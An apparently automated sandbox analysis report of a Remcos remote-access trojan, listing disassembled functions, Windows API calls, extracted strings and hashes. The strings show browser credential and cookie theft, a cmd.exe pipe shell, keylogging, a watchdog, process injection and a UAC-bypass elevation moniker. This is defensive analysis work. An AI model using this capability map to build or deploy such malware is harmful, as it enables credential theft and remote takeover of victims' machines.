                                                      • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                      Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 724 446aff-446b0b 725 446b3d-446b48 call 445354 724->725 726 446b0d-446b0f 724->726 733 446b4a-446b4c 725->733 727 446b11-446b12 726->727 728 446b28-446b39 RtlAllocateHeap 726->728 727->728 730 446b14-446b1b call 4447c5 728->730 731 446b3b 728->731 730->725 736 446b1d-446b26 call 442200 730->736 731->733 736->725 736->728
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                      • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                      • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                      • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF

                                                      Non-executed Functions

                                                      Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                      • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                      • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                        • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                        • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                        • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                        • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                        • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                        • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                        • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                        • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                        • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                        • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                        • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                      • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                      • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                        • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                        • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                        • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                      • Sleep.KERNEL32(000007D0), ref: 00407976
                                                      • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                        • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                      • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                      • API String ID: 2918587301-599666313
                                                      • Opcode ID: fe774ec57ea4c9c98434e9a8a4b205946b127d152570ca2712e415059fb31443
                                                      • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                      • Opcode Fuzzy Hash: fe774ec57ea4c9c98434e9a8a4b205946b127d152570ca2712e415059fb31443
                                                      • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                      Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0040508E
                                                        • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                        • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      • __Init_thread_footer.LIBCMT ref: 004050CB
                                                      • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                      • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                        • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                        • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                        • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                      • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                      • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                      • CloseHandle.KERNEL32 ref: 004053CD
                                                      • CloseHandle.KERNEL32 ref: 004053D5
                                                      • CloseHandle.KERNEL32 ref: 004053E7
                                                      • CloseHandle.KERNEL32 ref: 004053EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                      • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                      • API String ID: 3815868655-81343324
                                                      • Opcode ID: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                      • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                      • Opcode Fuzzy Hash: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                      • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                      Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                        • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                        • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                        • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                      • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                        • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                        • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                        • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                      • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                      • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                      • API String ID: 65172268-860466531
                                                      • Opcode ID: 5a81626a4609f3178aed30ff3a92a065a3326e2b32edd8bbe01bcb9fad261df8
                                                      • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                      • Opcode Fuzzy Hash: 5a81626a4609f3178aed30ff3a92a065a3326e2b32edd8bbe01bcb9fad261df8
                                                      • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                      Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                      • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                      • FindClose.KERNEL32(00000000), ref: 0040B517
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$CloseFile$FirstNext
                                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                      • API String ID: 1164774033-3681987949
                                                      • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                      • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                      • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                      • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                      Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                      • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                      • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                      • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$Close$File$FirstNext
                                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                      • API String ID: 3527384056-432212279
                                                      • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                      • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                      • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                      • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                      Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                      • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                        • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                        • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                        • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                      • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                      • API String ID: 726551946-3025026198
                                                      • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                      • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                      • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                      • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                      Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenClipboard.USER32 ref: 004159C7
                                                      • EmptyClipboard.USER32 ref: 004159D5
                                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                      • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                      • CloseClipboard.USER32 ref: 00415A5A
                                                      • OpenClipboard.USER32 ref: 00415A61
                                                      • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                      • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                      • CloseClipboard.USER32 ref: 00415A89
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                      • String ID:
                                                      • API String ID: 3520204547-0
                                                      • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                      • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                      • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                      • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                      Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$1$2$3$4$5$6$7
                                                      • API String ID: 0-3177665633
                                                      • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                      • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                      • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                      • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                      Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00409B3F
                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                      • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                      • GetKeyState.USER32(00000010), ref: 00409B5C
                                                      • GetKeyboardState.USER32(?), ref: 00409B67
                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                      • String ID: 8[G
                                                      • API String ID: 1888522110-1691237782
                                                      • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                      • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                      • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                      • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                      Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00406788
                                                      • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Object_wcslen
                                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                      • API String ID: 240030777-3166923314
                                                      • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                      • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                      • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                      • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                      Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                      • GetLastError.KERNEL32 ref: 00419935
                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                      • String ID:
                                                      • API String ID: 3587775597-0
                                                      • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                      • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                      • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                      • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                      Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                      • String ID: <D$<D$<D
                                                      • API String ID: 745075371-3495170934
                                                      • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                      • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                      • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                      • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                      Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                        • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                      • String ID:
                                                      • API String ID: 2341273852-0
